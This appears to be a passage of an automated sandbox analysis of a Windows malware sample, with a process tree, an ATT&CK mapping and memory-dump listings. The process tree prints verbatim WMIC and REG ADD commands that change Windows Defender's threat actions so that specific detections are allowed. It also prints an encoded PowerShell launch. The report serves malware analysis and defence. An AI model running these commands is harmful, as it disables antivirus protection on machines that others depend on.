- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:7180
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:8088
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:9192
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:6876
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:8252
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4284
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:8796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6424

C:\Users\Admin\AppData\Local\Temp\2BFB.exe
C:\Users\Admin\AppData\Local\Temp\2BFB.exe
1⤵
PID:8084

C:\Users\Admin\AppData\Local\Temp\8651.exe
C:\Users\Admin\AppData\Local\Temp\8651.exe
1⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\92B6.exe
C:\Users\Admin\AppData\Local\Temp\92B6.exe
1⤵
PID:7240

C:\Users\Admin\AppData\Local\Temp\994E.exe
C:\Users\Admin\AppData\Local\Temp\994E.exe
1⤵
PID:1012
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
  2⤵
  PID:6208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/492-239-0x0000000004A80000-0x0000000004A9D000-memory.dmp

Filesize
116KB

Download
memory/492-244-0x0000000005F40000-0x0000000005F41000-memory.dmp

Filesize
4KB

Download
memory/492-238-0x00000000058C0000-0x00000000058E3000-memory.dmp

Filesize
140KB

Download
memory/492-266-0x0000000005A30000-0x0000000005A31000-memory.dmp

Filesize
4KB

Download
memory/492-215-0x0000000004F30000-0x0000000004F31000-memory.dmp

Filesize
4KB

Download
memory/492-255-0x0000000005B00000-0x0000000005B01000-memory.dmp

Filesize
4KB

Download
memory/492-211-0x00000000049D0000-0x00000000049D1000-memory.dmp

Filesize
4KB

Download
memory/492-250-0x00000000059D0000-0x00000000059D1000-memory.dmp

Filesize
4KB

Download
memory/492-204-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/888-137-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/888-134-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/888-138-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/888-133-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/888-141-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/888-139-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/888-135-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1012-330-0x0000025145C20000-0x0000025145C94000-memory.dmp

Filesize
464KB

Download
memory/1044-354-0x000001E51DFB0000-0x000001E51E024000-memory.dmp

Filesize
464KB

Download
memory/1096-352-0x0000029C56570000-0x0000029C565E4000-memory.dmp

Filesize
464KB

Download
memory/1124-348-0x00000000775C0000-0x000000007774E000-memory.dmp

Filesize
1.6MB

Download
memory/1124-397-0x00000000052F0000-0x00000000052F1000-memory.dmp

Filesize
4KB

Download
memory/1224-378-0x0000019CBB3D0000-0x0000019CBB444000-memory.dmp

Filesize
464KB

Download
memory/1352-379-0x0000024004D40000-0x0000024004DB4000-memory.dmp

Filesize
464KB

Download
memory/1416-362-0x0000020E8C7D0000-0x0000020E8C844000-memory.dmp

Filesize
464KB

Download
memory/1452-329-0x000001BE98A80000-0x000001BE98AF4000-memory.dmp

Filesize
464KB

Download
memory/1488-214-0x000001CD78930000-0x000001CD789AE000-memory.dmp

Filesize
504KB

Download
memory/1488-200-0x000001CD75900000-0x000001CD75902000-memory.dmp

Filesize
8KB

Download
memory/1488-218-0x000001CD75902000-0x000001CD75904000-memory.dmp

Filesize
8KB

Download
memory/1488-234-0x000001CD75905000-0x000001CD75907000-memory.dmp

Filesize
8KB

Download
memory/1488-232-0x000001CD75904000-0x000001CD75905000-memory.dmp

Filesize
4KB

Download
memory/1488-193-0x000001CD5B200000-0x000001CD5B201000-memory.dmp

Filesize
4KB

Download
memory/1488-198-0x000001CD5B4A0000-0x000001CD5B4AB000-memory.dmp

Filesize
44KB

Download
memory/1780-223-0x0000000000400000-0x000000000044D000-memory.dmp

Filesize
308KB

Download
memory/1780-228-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/1816-365-0x00000145D79D0000-0x00000145D7A44000-memory.dmp

Filesize
464KB

Download
memory/1952-226-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/1952-224-0x0000000000A60000-0x0000000000B34000-memory.dmp

Filesize
848KB

Download
memory/2004-299-0x0000000005230000-0x0000000005248000-memory.dmp

Filesize
96KB

Download
memory/2004-283-0x00000000009C0000-0x00000000009C1000-memory.dmp

Filesize
4KB

Download
memory/2004-305-0x00000000051C0000-0x00000000056BE000-memory.dmp

Filesize
5.0MB

Download
memory/2004-307-0x0000000005250000-0x0000000005253000-memory.dmp

Filesize
12KB

Download
memory/2272-346-0x0000015F0BD30000-0x0000015F0BDA4000-memory.dmp

Filesize
464KB

Download
memory/2296-326-0x00000000775C0000-0x000000007774E000-memory.dmp

Filesize
1.6MB

Download
memory/2296-400-0x00000000051C0000-0x00000000051C1000-memory.dmp

Filesize
4KB

Download
memory/2308-336-0x00000215E74A0000-0x00000215E7514000-memory.dmp

Filesize
464KB

Download
memory/2316-208-0x0000000007402000-0x0000000007403000-memory.dmp

Filesize
4KB

Download
memory/2316-201-0x0000000003680000-0x0000000003681000-memory.dmp

Filesize
4KB

Download
memory/2316-253-0x0000000007A00000-0x0000000007A01000-memory.dmp

Filesize
4KB

Download
memory/2316-221-0x00000000080E0000-0x00000000080E1000-memory.dmp

Filesize
4KB

Download
memory/2316-447-0x0000000007403000-0x0000000007404000-memory.dmp

Filesize
4KB

Download
memory/2316-225-0x0000000008380000-0x0000000008381000-memory.dmp

Filesize
4KB

Download
memory/2316-207-0x0000000007A40000-0x0000000007A41000-memory.dmp

Filesize
4KB

Download
memory/2316-260-0x0000000008C20000-0x0000000008C21000-memory.dmp

Filesize
4KB

Download
memory/2316-426-0x000000007F8B0000-0x000000007F8B1000-memory.dmp

Filesize
4KB

Download
memory/2316-202-0x0000000007400000-0x0000000007401000-memory.dmp

Filesize
4KB

Download
memory/2316-220-0x0000000008070000-0x0000000008071000-memory.dmp

Filesize
4KB

Download
memory/2316-219-0x0000000007980000-0x0000000007981000-memory.dmp

Filesize
4KB

Download
memory/2448-323-0x0000025B6FE60000-0x0000025B6FED4000-memory.dmp

Filesize
464KB

Download
memory/2564-387-0x0000013737200000-0x0000013737274000-memory.dmp

Filesize
464KB

Download
memory/2572-398-0x0000023A54A00000-0x0000023A54A74000-memory.dmp

Filesize
464KB

Download
memory/2804-363-0x00000000054D0000-0x0000000005AD6000-memory.dmp

Filesize
6.0MB

Download
memory/3036-256-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3216-222-0x0000000000920000-0x0000000000968000-memory.dmp

Filesize
288KB

Download
memory/3216-227-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/3576-197-0x0000000002D50000-0x0000000002D52000-memory.dmp

Filesize
8KB

Download
memory/3576-182-0x0000000000470000-0x0000000000471000-memory.dmp

Filesize
4KB

Download
memory/3608-286-0x0000000000B10000-0x0000000000B12000-memory.dmp

Filesize
8KB

Download
memory/3608-279-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/3728-210-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/3820-205-0x0000000000990000-0x0000000000992000-memory.dmp

Filesize
8KB

Download
memory/3820-191-0x0000000000980000-0x0000000000981000-memory.dmp

Filesize
4KB

Download
memory/3820-175-0x0000000000370000-0x0000000000371000-memory.dmp

Filesize
4KB

Download
memory/4140-217-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4380-315-0x00000247609C0000-0x0000024760A34000-memory.dmp

Filesize
464KB

Download
memory/4380-312-0x0000024760900000-0x000002476094D000-memory.dmp

Filesize
308KB

Download
memory/4512-233-0x00000000007A0000-0x00000000007A1000-memory.dmp

Filesize
4KB

Download
memory/4644-259-0x00000000027A0000-0x00000000027A1000-memory.dmp

Filesize
4KB

Download
memory/4644-249-0x0000000000420000-0x0000000000421000-memory.dmp

Filesize
4KB

Download
memory/4644-265-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

Filesize
4KB

Download
memory/4644-280-0x0000000007650000-0x0000000007651000-memory.dmp

Filesize
4KB

Download
memory/4644-285-0x00000000071F0000-0x00000000071F1000-memory.dmp

Filesize
4KB

Download
memory/4708-344-0x0000000005340000-0x0000000005946000-memory.dmp

Filesize
6.0MB

Download
memory/4708-322-0x0000000000400000-0x0000000000401000-memory.dmp

Filesize
4KB

Download
memory/4708-303-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4728-257-0x0000000003290000-0x0000000003292000-memory.dmp

Filesize
8KB

Download
memory/4836-251-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

Filesize
4KB

Download
memory/4836-411-0x0000000001540000-0x0000000001542000-memory.dmp

Filesize
8KB

Download
memory/4876-403-0x0000000000460000-0x00000000005AA000-memory.dmp

Filesize
1.3MB

Download
memory/4876-406-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/4892-316-0x0000000004820000-0x000000000487F000-memory.dmp

Filesize
380KB

Download
memory/4892-314-0x000000000496A000-0x0000000004A6B000-memory.dmp

Filesize
1.0MB

Download
memory/4996-263-0x00000000004C0000-0x00000000004C1000-memory.dmp

Filesize
4KB

Download
memory/4996-269-0x00000000009D0000-0x00000000009D1000-memory.dmp

Filesize
4KB

Download
memory/4996-281-0x000000001B2B0000-0x000000001B2B2000-memory.dmp

Filesize
8KB

Download
memory/5012-453-0x00000000021E3000-0x00000000021E4000-memory.dmp

Filesize
4KB

Download
memory/5012-445-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/5012-452-0x00000000021E2000-0x00000000021E3000-memory.dmp

Filesize
4KB

Download
memory/5012-448-0x00000000021E0000-0x00000000021E1000-memory.dmp

Filesize
4KB

Download
memory/5012-443-0x00000000007D0000-0x0000000000800000-memory.dmp

Filesize
192KB

Download
memory/5112-308-0x00000000030F0000-0x00000000030F1000-memory.dmp

Filesize
4KB

Download
memory/5112-296-0x00000000057E0000-0x00000000057E1000-memory.dmp

Filesize
4KB

Download
memory/5112-291-0x0000000000F50000-0x0000000000F51000-memory.dmp

Filesize
4KB

Download
memory/5112-300-0x0000000005760000-0x0000000005761000-memory.dmp

Filesize
4KB

Download
memory/5540-405-0x000000001B770000-0x000000001B772000-memory.dmp

Filesize
8KB

Download
memory/5824-428-0x00000288577E2000-0x00000288577E4000-memory.dmp

Filesize
8KB

Download
memory/5824-418-0x00000288577E0000-0x00000288577E2000-memory.dmp

Filesize
8KB

Download